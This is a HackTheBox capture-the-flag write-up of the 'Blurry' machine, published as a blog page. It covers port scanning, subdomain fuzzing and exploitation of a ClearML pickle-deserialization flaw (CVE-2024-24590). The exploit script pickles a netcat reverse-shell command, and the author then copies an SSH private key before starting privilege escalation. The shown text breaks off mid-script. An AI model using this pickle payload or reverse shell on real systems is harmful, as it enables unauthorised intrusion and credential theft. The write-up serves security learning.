<!doctype html><html lang=en><head><meta charset=UTF-8><meta http-equiv=X-UA-Compatible content="ie=edge"><meta name=viewport content="width=device-width,initial-scale=1"><meta name=mobile-web-app-capable content="yes"><meta name=apple-mobile-web-app-capable content="yes"><meta name=application-name content><meta name=apple-mobile-web-app-status-bar-style content="#fff"><meta name=apple-mobile-web-app-title content><title>Blurry | HackTheBox -
</title><link rel=alternate href=https://h4r1337.github.io/posts/blurry/ hreflang=en><link rel=canonical href=https://h4r1337.github.io/posts/blurry/><link rel=prev href=https://h4r1337.github.io/posts/board-light/><link rel=next href=https://h4r1337.github.io/posts/permx/><meta name=description content="Blurry is a medium-difficulty Linux machine that features DevOps-related vectors surrounding machine learning. The foothold is comprised of a series of CVEs recently disclosed about the ClearML suite. The service provides a web platform, a fileserver, and an API; all of which contain vulnerabilities [`CVE-2024-24590`](https://nvd.nist.gov/vuln/detail/CVE-2024-24590) - [`CVE-2024-24595`](https://nvd.nist.gov/vuln/detail/CVE-2024-24595) that can be chained together for remote code execution. Once a shell on the target is obtained, a program that can be run with `sudo` is discovered. The program loads arbitrary `PyTorch` models to evaluate them against a protected dataset. While it is known that such models are susceptible to insecure deserialisation, `fickling` is used to scan the dataset for insecure `pickle` files , prior to loading the model. Malicious code can be injected into a model, using `runpy` to bypass the `fickling` checks."><meta name=keywords content="HTB,hackthebox,Writeup,Walkthrough,Blurry,Linux,Medium,MLOps,pickle,CVE-2024-24590,ClearML,fickling,Deserialization,RCE,PyTorch"><meta property="og:url" content="https://h4r1337.github.io/posts/blurry/"><meta property="og:site_name" content="h4r1337 blog | CTF writeups"><meta property="og:title" content="Blurry | HackTheBox"><meta property="og:description" content="Blurry is a medium-difficulty Linux machine that features DevOps-related vectors surrounding machine learning. The foothold is comprised of a series of CVEs recently disclosed about the ClearML suite. The service provides a web platform, a fileserver, and an API; all of which contain vulnerabilities [`CVE-2024-24590`](https://nvd.nist.gov/vuln/detail/CVE-2024-24590) - [`CVE-2024-24595`](https://nvd.nist.gov/vuln/detail/CVE-2024-24595) that can be chained together for remote code execution. Once a shell on the target is obtained, a program that can be run with `sudo` is discovered. The program loads arbitrary `PyTorch` models to evaluate them against a protected dataset. While it is known that such models are susceptible to insecure deserialisation, `fickling` is used to scan the dataset for insecure `pickle` files , prior to loading the model. Malicious code can be injected into a model, using `runpy` to bypass the `fickling` checks."><meta property="og:locale" content="en"><meta property="og:type" content="article"><meta property="article:section" content="posts"><meta property="article:published_time" content="2024-10-13T18:13:48+05:30"><meta property="article:modified_time" content="2024-10-13T18:13:48+05:30"><meta property="article:tag" content="HackTheBox"><meta property="article:tag" content="Linux"><meta property="article:tag" content="Medium"><meta property="article:tag" content="MLOps"><meta property="article:tag" content="Pickle"><meta property="article:tag" content="CVE-2024-24590"><meta property="og:image" content="https://h4r1337.github.io/img/blurry/cover.webp"><meta property="og:see_also" content="https://h4r1337.github.io/posts/resource/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/permx/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/board-light/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/perfection/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/two-million/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/precious/"><meta name=twitter:card content="summary_large_image"><meta name=twitter:image content="https://h4r1337.github.io/img/blurry/cover.webp"><meta name=twitter:title content="Blurry | HackTheBox"><meta name=twitter:description content="Blurry is a medium-difficulty Linux machine that features DevOps-related vectors surrounding machine learning. The foothold is comprised of a series of CVEs recently disclosed about the ClearML suite. The service provides a web platform, a fileserver, and an API; all of which contain vulnerabilities [`CVE-2024-24590`](https://nvd.nist.gov/vuln/detail/CVE-2024-24590) - [`CVE-2024-24595`](https://nvd.nist.gov/vuln/detail/CVE-2024-24595) that can be chained together for remote code execution. Once a shell on the target is obtained, a program that can be run with `sudo` is discovered. The program loads arbitrary `PyTorch` models to evaluate them against a protected dataset. While it is known that such models are susceptible to insecure deserialisation, `fickling` is used to scan the dataset for insecure `pickle` files , prior to loading the model. Malicious code can be injected into a model, using `runpy` to bypass the `fickling` checks."><meta name=referrer content="no-referrer-when-downgrade"><link rel=apple-touch-icon sizes=180x180 href=/favicons/apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=/favicons/favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=/favicons/favicon-16x16.png><link rel=manifest href=/favicons/site.webmanifest><link rel=mask-icon href=/favicons/safari-pinned-tab.svg color=#5bbad5><meta name=apple-mobile-web-app-title content="Jekyll Klise"><meta name=application-name content="Jekyll Klise"><meta name=msapplication-TileColor content="#da532c"><meta name=theme-color content="#2c2c2c"><link href=https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css rel=stylesheet><link rel=stylesheet href=/sass/main.min.2480d733c3cd78de5d135eb2d8c0b0f964b2bf1e047d180f4f363bdcc3b23b20.css integrity="sha256-JIDXM8PNeN5dE16y2MCw+WSyvx4EfRgPTzY73MOyOyA="><link rel=stylesheet href=/lib/fontawesome-free/all.min.e5e202e3c899507992952533f57b634722b69b34241d271963559d31aa33ef81.css integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E="></head><body data-theme=dark class=notransition><script>const body=document.body,data=body.getAttribute("data-theme"),initTheme=e=>{e==="dark"?body.setAttribute("data-theme","dark"):e==="light"?body.removeAttribute("data-theme"):localStorage.setItem("theme",data)};initTheme(localStorage.getItem("theme")),setTimeout(()=>body.classList.remove("notransition"),75)</script><script id=partial/analytics.html data-goatcounter=https://h4r1337-blog.goatcounter.com/count async src=//gc.zgo.at/count.js></script><div class=navbar role=navigation><nav class=menu><input type=checkbox id=menu-trigger class=menu-trigger>
<label for=menu-trigger><span class=menu-icon><svg width="24" height="24" viewBox="0 0 512 512"><path d="M64 384H448V341.33H64zm0-106.67H448V234.67H64zM64 128v42.67H448V128z"/></svg>
</span></label><a id=mode href=#><svg class="mode-sunny" width="24" height="24" viewBox="0 0 512 512"><title>LIGHT</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg><svg class="mode-moon" width="24" height="24" viewBox="0 0 512 512"><title>DARK</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg></a><div class=trigger><div class=trigger-container><a class=menu-link href=/ title=home>home
</a><a class=menu-link href=/posts title=posts>posts
</a><a class=menu-link href=/series title=series>series
</a><a class=menu-link href=/resume.pdf title=resume>resume
</a><a class=menu-link href=/whoami title=whoami>whoami
</a><a class="menu-link rss" href=/index.xml><svg width="17" height="17" viewBox="0 0 512 512" fill="#ed812e"><title>RSS</title><path d="M108.56 342.78a60.34 60.34.0 1060.56 60.44 60.63 60.63.0 00-60.56-60.44z"/><path d="M48 186.67v86.55c52 0 101.94 15.39 138.67 52.11s52 86.56 52 138.67h86.66c0-151.56-125.66-277.33-277.33-277.33z"/><path d="M48 48v86.56c185.25.0 329.22 144.08 329.22 329.44H464C464 234.66 277.67 48 48 48z"/></svg></a></div></div></nav></div><div class="wrapper post"><main class=page-content aria-label=Content><article itemscope itemtype=https://schema.org/BlogPosting><header class=header><div class=tags><span itemprop=keywords><a href=https://h4r1337.github.io/tags/hackthebox/ class=tag>HACKTHEBOX</a>
,
<a href=https://h4r1337.github.io/tags/linux/ class=tag>LINUX</a>
,
<a href=https://h4r1337.github.io/tags/medium/ class=tag>MEDIUM</a>
,
<a href=https://h4r1337.github.io/tags/mlops/ class=tag>MLOPS</a>
,
<a href=https://h4r1337.github.io/tags/pickle/ class=tag>PICKLE</a>
,
<a href=https://h4r1337.github.io/tags/cve-2024-24590/ class=tag>CVE-2024-24590</a>
,
<a href=https://h4r1337.github.io/tags/clearml/ class=tag>CLEARML</a>
,
<a href=https://h4r1337.github.io/tags/fickling/ class=tag>FICKLING</a>
,
<a href=https://h4r1337.github.io/tags/deserialization/ class=tag>DESERIALIZATION</a>
,
<a href=https://h4r1337.github.io/tags/rce/ class=tag>RCE</a>
,
<a href=https://h4r1337.github.io/tags/pytorch/ class=tag>PYTORCH</a></span></div><h1 class=header-title itemprop=headline>Blurry | HackTheBox</h1><div class=post-meta><time datetime="2024-10-13 18:13:48 +0530 +0530" itemprop=datePublished>2024-10-13
</time><span itemprop=author itemscope itemtype=https://schema.org/Person><span itemprop=name>h4r1337</span>
</span><time hidden datetime="2024-10-13 18:13:48 +0530 +0530" itemprop=dateModified></time>
<span hidden itemprop=publisher itemtype=Person>h4r1337</span>
<span hidden itemprop=mainEntityOfPage>Blurry is a medium-difficulty Linux machine that features DevOps-related vectors surrounding machine learning. The foothold is comprised of a series of CVEs recently disclosed about the ClearML suite. The service provides a web platform, a fileserver, and an API; all of which contain vulnerabilities [`CVE-2024-24590`](https://nvd.nist.gov/vuln/detail/CVE-2024-24590) - [`CVE-2024-24595`](https://nvd.nist.gov/vuln/detail/CVE-2024-24595) that can be chained together for remote code execution. Once a shell on the target is obtained, a program that can be run with `sudo` is discovered. The program loads arbitrary `PyTorch` models to evaluate them against a protected dataset. While it is known that such models are susceptible to insecure deserialisation, `fickling` is used to scan the dataset for insecure `pickle` files , prior to loading the model. Malicious code can be injected into a model, using `runpy` to bypass the `fickling` checks.</span></div></header><div class=page-content itemprop=articleBody><h3 id=overview><a href=#overview class=anchor-head aria-label=Anchor></a>Overview</h3><figure><img src=/img/blurry/cover.webp></figure><table><thead><tr><th style=text-align:center>Title</th><th style=text-align:center><a href=https://app.hackthebox.com/machines/Blurry>Blurry</a></th></tr></thead><tbody><tr><td style=text-align:center>Difficulty</td><td style=text-align:center>Medium</td></tr><tr><td style=text-align:center>Machine</td><td style=text-align:center>Linux</td></tr><tr><td style=text-align:center>Maker</td><td style=text-align:center><a href=https://app.hackthebox.com/users/458049><img src=https://www.hackthebox.com/badge/image/458049 alt style=display:unset></a></td></tr></tbody></table><br><div class="alert alert-tip collapsed"><div class=alert-heading-box onclick=toggleAlert(this)><i class="bx bx-bulb"></i><p class=alert-heading>About Blurry</p><i class='bx bx-chevron-down collapsed'></i></div><div class=alert-content style=display:none><p>Blurry is a medium-difficulty Linux machine that features DevOps-related vectors surrounding machine learning. The foothold is comprised of a series of CVEs recently disclosed about the ClearML suite. The service provides a web platform, a fileserver, and an API; all of which contain vulnerabilities (<a href=https://nvd.nist.gov/vuln/detail/CVE-2024-24590>CVE-2024-24590</a> - <a href=https://nvd.nist.gov/vuln/detail/CVE-2024-24595>CVE-2024-24595</a>) that can be chained together for remote code execution. Once a shell on the target is obtained, a program that can be run with <code>sudo</code> is discovered. The program loads arbitrary <code>PyTorch</code> models to evaluate them against a protected dataset. While it is known that such models are susceptible to insecure deserialisation, <code>fickling</code> is used to scan the dataset for insecure <code>pickle</code> files , prior to loading the model. Malicious code can be injected into a model, using <code>runpy</code> to bypass the <code>fickling</code> checks.</p></div></div><script>function toggleAlert(e){var t=e.parentElement,s=t.querySelector(".alert-content"),n=e.querySelectorAll("i")[1];t.classList.toggle("open"),t.classList.toggle("collapsed"),t.classList.contains("open")?(s.style.display="block",n.classList.remove("open"),n.classList.add("collapsed")):(n.classList.remove("collapsed"),n.classList.add("open"),s.style.display="none")}</script><h2 id=information-gathering><a href=#information-gathering class=anchor-head aria-label=Anchor></a>Information Gathering</h2><p>Scanned all TCP ports:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>nmap -p- -vv --min-rate <span style=color:#d3869b>5000</span> 10.10.11.19 -oA nmap/ports
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> app.blurry.htb <span style=color:#fe8019>(</span>10.10.11.19<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>Host is up, received conn-refused <span style=color:#fe8019>(</span>0.21s latency<span style=color:#fe8019>)</span>.
</span></span><span style=display:flex><span>Scanned at 2024-10-13 12:51:47 IST <span style=color:#fe8019>for</span> 246s
</span></span><span style=display:flex><span>Not shown: <span style=color:#d3869b>43506</span> filtered ports, <span style=color:#d3869b>22027</span> closed ports
</span></span><span style=display:flex><span>Reason: <span style=color:#d3869b>43506</span> no-responses and <span style=color:#d3869b>22027</span> conn-refused
</span></span><span style=display:flex><span>PORT   STATE SERVICE REASON
</span></span><span style=display:flex><span>22/tcp open  ssh     syn-ack
</span></span><span style=display:flex><span>80/tcp open  http    syn-ack
</span></span></code></pre></div><p>Enumerated open TCP ports:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>nmap -p22,80 -vv --min-rate <span style=color:#d3869b>5000</span> -sC -sV -oA nmap/service 10.10.11.19
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> app.blurry.htb <span style=color:#fe8019>(</span>10.10.11.19<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>Host is up, received syn-ack <span style=color:#fe8019>(</span>0.30s latency<span style=color:#fe8019>)</span>.
</span></span><span style=display:flex><span>Scanned at 2024-10-13 13:03:02 IST <span style=color:#fe8019>for</span> 16s
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>PORT   STATE SERVICE REASON  VERSION
</span></span><span style=display:flex><span>22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u3 <span style=color:#fe8019>(</span>protocol 2.0<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>80/tcp open  http    syn-ack nginx 1.18.0
</span></span><span style=display:flex><span>|_http-favicon: Unknown favicon MD5: 2CBD65DC962D5BF762BCB815CBD5EFCC
</span></span><span style=display:flex><span>| http-methods:
</span></span><span style=display:flex><span>|_  Supported Methods: GET HEAD
</span></span><span style=display:flex><span>|_http-server-header: nginx/1.18.0
</span></span><span style=display:flex><span>|_http-title: ClearML
</span></span><span style=display:flex><span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span></code></pre></div><p>There are only 2 ports open, <code>80</code> and <code>22</code></p><hr><h2 id=enumeration><a href=#enumeration class=anchor-head aria-label=Anchor></a>Enumeration</h2><h3 id=port-80---http-nginx-1180><a href=#port-80---http-nginx-1180 class=anchor-head aria-label=Anchor></a>Port 80 - HTTP (Nginx 1.18.0)</h3><figure><img src=/img/blurry/Pasted%20image%2020241013125133.webp></figure><p>Let&rsquo;s add <code>app.blurry.htb</code> to <code>/etc/hosts</code></p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span><span style=color:#fabd2f>echo</span> -e <span style=color:#b8bb26>&#39;10.10.11.19\tapp.blurry.htb&#39;</span> | sudo tee -a /etc/hosts
</span></span></code></pre></div><figure><img src=/img/blurry/Pasted%20image%2020241013125112.webp></figure><p>I then checked if there are any other subdomains present.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>ffuf -u http://10.10.11.19/ -H <span style=color:#b8bb26>&#39;Host: FUZZ.blurry.htb&#39;</span> -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs <span style=color:#d3869b>169</span>
</span></span></code></pre></div><h5 id=filesblurryhtb><code>files.blurry.htb</code></h5><figure><img src=/img/blurry/Pasted%20image%2020241013133519.webp></figure><h5 id=chatblurryhtb><code>chat.blurry.htb</code></h5><figure><img src=/img/blurry/Pasted%20image%2020241013133600.webp></figure><p>We can create a new account and see all the chats:</p><figure><img src=/img/blurry/Pasted%20image%2020241013133903.webp></figure><p>And there&rsquo;s this information in the announcement channel, this might come in handy later.</p><figure><img src=/img/blurry/Pasted%20image%2020241013134129.webp></figure><h5 id=appblurryhtb><code>app.blurry.htb</code></h5><p>This runs a ClearML server which is an open source MLOps platform.</p><figure><img src=/img/blurry/Pasted%20image%2020241013125332.webp></figure><p>Create a new account and view the dashboard</p><figure><img src=/img/blurry/Pasted%20image%2020241013125823.webp></figure><p>After looking at some of the requests, found the ClearML version used in this application</p><figure><img src=/img/blurry/Pasted%20image%2020241013130137.webp></figure><p>This version is vulnerable to RCE.</p><hr><h2 id=exploitation><a href=#exploitation class=anchor-head aria-label=Anchor></a>Exploitation</h2><h3 id=cve-2024-24590---clearml-pickle-artifact-upload-rce><a href=#cve-2024-24590---clearml-pickle-artifact-upload-rce class=anchor-head aria-label=Anchor></a>CVE-2024-24590 - ClearML Pickle Artifact Upload RCE</h3><blockquote><p>An attacker can execute arbitrary code on an end user&rsquo;s system by uploading a malicious pickle file as an artifact that triggers the deserialization flaw when a user calls the <code>get</code> method within the <code>Artifact</code> class to download and load a file into memory.</p></blockquote><p>The research team from <a href=https://hiddenlayer.com>HiddenLayer</a> found 6 zero-days, including this exploit in both, in the open-source and enterprise versions of ClearML. You can find information about all the other vulnerabilities in their <a href=https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/>blog</a>.</p><p>In python the pickle module is often used to store machine learning models for training, evaluation, and sharing. However, pickle is an inherently insecure module because it executes arbitrary commands when deserialized.
If there are no proper validation checks, and user created pickle files are deserialized, it can lead to remote code execution vulnerabilities. You can learn more about pickle and insecure deserialization vulnerabilites in these articles:</p><ul><li><a href=https://www.hackingarticles.in/python-serialization-vulnerabilities-pickle/>Python Serialization Vulnerabilities – Pickle</a></li><li><a href=https://intoli.com/blog/dangerous-pickles/>Dangerous Pickles — Malicious Python Serialization</a></li></ul><p>The vulnerability was inside the <code>Artifact.get</code> method, where the application directly loads the pickle object into memory without any checks. They <a href=https://github.com/allegroai/clearml/commit/e506831599bd8e072e5e54266abfccdfbe4be2ac#diff-dd2d5e773ee93fa198f108f03f3f0b8ed272d858cde70a01d41680327da3f133>fixed</a> the vulnerability by adding an additional hash validation with the hash value of the local file and the uploaded artifact:</p><figure><img src=/img/blurry/Pasted%20image%2020241013142251.webp></figure><p>To exploit this vulnerability, we first need to upload a malicious artifact file to the ClearML server. If any user happens to download and load the artifact into memory using the <code>Artifact.get</code> method, we can gain a reverse shell in the server as that user. From the RocketChat instance, we now know that the admin is periodically running an automated task to review all the artifacts with a <code>review</code> tag inside the <code>Black Swan</code> project.
Thus, we onle need to upload the artifact to the <code>Black Swan</code> project with a <code>review</code> tag and the admin will download it and run it, allowing us to obtain a reverse shell.</p><p>To exploit this we need to install the <code>clearml</code> pip package:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>pip install clearml
</span></span></code></pre></div><p>Then in the server, go to settings -> workspace and create new credentials.</p><figure><img src=/img/blurry/Pasted%20image%2020241013143231.webp></figure><p>Now add the configurations by running the <code>clearml-init</code> command, which is installed when you install the <code>clearml</code> pip package.</p><figure><img src=/img/blurry/Pasted%20image%2020241013144502.webp></figure><p>Don&rsquo;t forget to add <code>api.blurry.htb</code> to your <code>/etc/hosts</code> file as well.</p><div class="alert alert-note collapsed"><div class=alert-heading-box onclick=toggleAlert(this)><i class="bx bx-info-circle"></i><p class=alert-heading>Note</p><i class='bx bx-chevron-down collapsed'></i></div><div class=alert-content style=display:none><p>If you are getting this error:
<code>AttributeError: module 'lib' has no attribute 'OpenSSL_add_all_algorithms'</code></p><ul><li>Upgrade <code>cryptography</code>, <code>pyOpenSSL</code>, and <code>OpenSSL</code>:</li></ul><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>pip install --upgrade cryptography pyOpenSSL
</span></span></code></pre></div><ul><li>Reinstall <code>clearml</code></li></ul><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>pip install --upgrade clearml
</span></span></code></pre></div><p>If this fixes the issue then run <code>clearml-init</code> to add the configurations again.</p></div></div><script>function toggleAlert(e){var t=e.parentElement,s=t.querySelector(".alert-content"),n=e.querySelectorAll("i")[1];t.classList.toggle("open"),t.classList.toggle("collapsed"),t.classList.contains("open")?(s.style.display="block",n.classList.remove("open"),n.classList.add("collapsed")):(n.classList.remove("collapsed"),n.classList.add("open"),s.style.display="none")}</script><p>Now let&rsquo;s create an exploit to upload our artifact to the server:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#fe8019>from</span> clearml <span style=color:#fe8019>import</span> Task
</span></span><span style=display:flex><span><span style=color:#fe8019>import</span> pickle<span style=color:#fe8019>,</span> os
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>class</span> RunCommand:
</span></span><span style=display:flex><span>    <span style=color:#fe8019>def</span> <span style=color:#fabd2f>__reduce__</span>(self):
</span></span><span style=display:flex><span>	    ip <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#34;&#34;</span> <span style=color:#928374;font-style:italic># Enter your ip address</span>
</span></span><span style=display:flex><span>	    port <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#34;&#34;</span> <span style=color:#928374;font-style:italic># Enter listening port</span>
</span></span><span style=display:flex><span>        command <span style=color:#fe8019>=</span> <span style=color:#b8bb26>f</span><span style=color:#b8bb26>&#34;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2&gt;&amp;1|nc </span><span style=color:#b8bb26>{</span>ip<span style=color:#b8bb26>}</span><span style=color:#b8bb26> </span><span style=color:#b8bb26>{</span>port<span style=color:#b8bb26>}</span><span style=color:#b8bb26> &gt;/tmp/f&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fe8019>return</span> (os<span style=color:#fe8019>.</span>system, (command,))
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>def</span> <span style=color:#fabd2f>main</span>():
</span></span><span style=display:flex><span>    command <span style=color:#fe8019>=</span> RunCommand()
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    task <span style=color:#fe8019>=</span> Task<span style=color:#fe8019>.</span>init(project_name<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;Black Swan&#34;</span>, tags<span style=color:#fe8019>=</span>[<span style=color:#b8bb26>&#39;review&#39;</span>], task_name<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#39;exploit&#39;</span>)
</span></span><span style=display:flex><span>    task<span style=color:#fe8019>.</span>upload_artifact(name<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#39;pickle_artifact&#39;</span>, artifact_object<span style=color:#fe8019>=</span>command, retries<span style=color:#fe8019>=</span><span style=color:#d3869b>2</span>, wait_on_upload<span style=color:#fe8019>=</span><span style=color:#fe8019>True</span>)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> __name__ <span style=color:#fe8019>==</span> <span style=color:#b8bb26>&#34;__main__&#34;</span>:
</span></span><span style=display:flex><span>    main()
</span></span></code></pre></div><p>And now start a netcat listener:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>nc -lnvp <span style=color:#d3869b>1234</span>
</span></span></code></pre></div><p>then run the exploit:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>python3 exploit.py
</span></span></code></pre></div><p>wait for the task to run</p><figure><img src=/img/blurry/Pasted%20image%2020241013150806.webp></figure><p>let&rsquo;s copy <code>.ssh/id_rsa</code> file to login using ssh.</p><figure><img src=/img/blurry/Pasted%20image%2020241013150951.webp></figure><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>chmod <span style=color:#d3869b>600</span> id_rsa
</span></span><span style=display:flex><span>ssh jippity@10.10.11.19 -i id_rsa
</span></span></code></pre></div><figure><img src=/img/blurry/Pasted%20image%2020241013151228.webp></figure><hr><h2 id=privilege-escalation><a href=#privilege-escalation class=anchor-head aria-label=Anchor></a>Privilege Escalation</h2><h3 id=local-enumeration><a href=#local-enumeration class=anchor-head aria-label=Anchor></a>Local Enumeration</h3><figure><img src=/img/blurry/Pasted%20image%2020241013151347.webp></figure><p>There are only 2 users in this machine. The user jippity can run <code>/usr/bin/evaluate_model</code> as root.</p><figure><img src=/img/blurry/Pasted%20image%2020241013151435.webp></figure><p>which is a bash script:</p><figure><img src=/img/blurry/Pasted%20image%2020241013151728.webp></figure><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span><span style=color:#8ec07c>#!/bin/bash
</span></span></span><span style=display:flex><span><span style=color:#8ec07c></span><span style=color:#928374;font-style:italic># Evaluate a given model against our proprietary dataset.</span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># Security checks against model file included.</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> <span style=color:#fe8019>[</span> <span style=color:#b8bb26>&#34;</span>$#<span style=color:#b8bb26>&#34;</span> -ne <span style=color:#d3869b>1</span> <span style=color:#fe8019>]</span>; <span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>    /usr/bin/echo <span style=color:#b8bb26>&#34;Usage: </span>$0<span style=color:#b8bb26> &lt;path_to_model.pth&gt;&#34;</span>
</span></span><span style=display:flex><span>    <span style=color:#fabd2f>exit</span> <span style=color:#d3869b>1</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>fi</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>MODEL_FILE<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;</span>$1<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span>TEMP_DIR<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;/opt/temp&#34;</span>
</span></span><span style=display:flex><span>PYTHON_SCRIPT<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;/models/evaluate_model.py&#34;</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>/usr/bin/mkdir -p <span style=color:#b8bb26>&#34;</span>$TEMP_DIR<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>file_type<span style=color:#fe8019>=</span><span style=color:#fe8019>$(</span>/usr/bin/file --brief <span style=color:#b8bb26>&#34;</span>$MODEL_FILE<span style=color:#b8bb26>&#34;</span><span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># Extract based on file type</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> <span style=color:#fe8019>[[</span> <span style=color:#b8bb26>&#34;</span>$file_type<span style=color:#b8bb26>&#34;</span> <span style=color:#fe8019>==</span> *<span style=color:#b8bb26>&#34;POSIX tar archive&#34;</span>* <span style=color:#fe8019>]]</span>; <span style=color:#fe8019>then</span>
